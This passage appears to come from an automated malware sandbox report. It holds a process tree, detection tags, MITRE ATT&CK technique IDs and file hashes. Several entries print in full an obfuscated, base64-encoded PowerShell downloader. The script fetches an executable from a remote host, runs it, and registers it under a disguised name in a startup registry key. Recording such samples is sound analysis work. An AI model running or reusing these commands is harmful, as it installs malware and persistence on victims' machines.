QQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:860
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
070760e079f62e4dcf6fdc01171a5ce1

SHA1
fbc5176e42c678b90679cc3afa5858a6d8f1785f

SHA256
688068aa678921f90b51de137af2781cdb587ea69e4ba266897bdc2d1b057ec5

SHA512
c226b60153dfdfd841361b601d554729c2a946597243073a55dcfacf2c6329fe3ef5c9978f57f9583a9b4899169e890225cf1a919fbf9a6d0fa002a7efc54d15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
051ffe4e30e640660e2038db21a9abdd

SHA1
d7bddb3897404e33705652834cb772b1eb7ceb2d

SHA256
3c8e7a51f17d494217bf75c439fe2285fbbf22e7d62af3b07c7281c22866c12a

SHA512
2b3a270c78c8cb167069809e3e67d081ac6714be3493f052d1c01227e84e878dc814fd488bee888235a80ad298f4379e747caf68fc4361b51b416cbe73500d64

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
46433bbebdb044e68a6feb6ea250858d

SHA1
d0311ee2dddc73b9ce36f011bcee5d134aaa308c

SHA256
4628e1b4cfc161e00343160a1cba6261f8e34342740c7d613b402f3cf674203e

SHA512
2c6b0ce26f58de8ad36be10ecb10663dee97f4431fbd098befefdbd259bd3e246547705dbd44a4652d0fc36c7fa140491c75129311d09aaa574867d25a870ed3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
f087897760326babaef3be69359da5a6

SHA1
d38179026972dd09c48cc95e0d4c7489c7acb480

SHA256
6700f91891bb5048fc34871242eced500941de52e97f1609c2edf54e322917d7

SHA512
8d10fbd3a0d58696b10d9a687087fc5209c15727c8c9ea53b6dbf0ce1f19e47d463622db0ca3b9eca646928aaf623bb944347185b033a975d6efc370ae822eb8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
96e498d4c8d4d55c9a44129e901f115a

SHA1
47b52c161f940d51613a8c5dd9f2b73894df70e6

SHA256
e4e7b2db4ef8a589b32f56a18c437bf8eda862a6b526917031dbdf7abe8376bf

SHA512
132ccafae589a9ca820c21e1546090a79bc6a210fda0bab20a730156638c8f3e06d5c166a30911221745f9f6a150354ee2c9e64388c7885a648753fdf14840e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
09a4366b8bc43b55d8ee896f7a9af8d9

SHA1
d5b9c0e2dd0f71f6697bd061467e99bf8b468542

SHA256
1729e85327e4a9bd49364b1002cec5f3cc31dd74974726c70a81a4054c034c4a

SHA512
af85789663a69fa71acd0978e757cd5e0d8e096f8ca5c26bed91624f0156e360e5c2502e7b3c159d949d132065ad104eec802d75a5a1fa7e1843a2757d7ad233

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5

MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
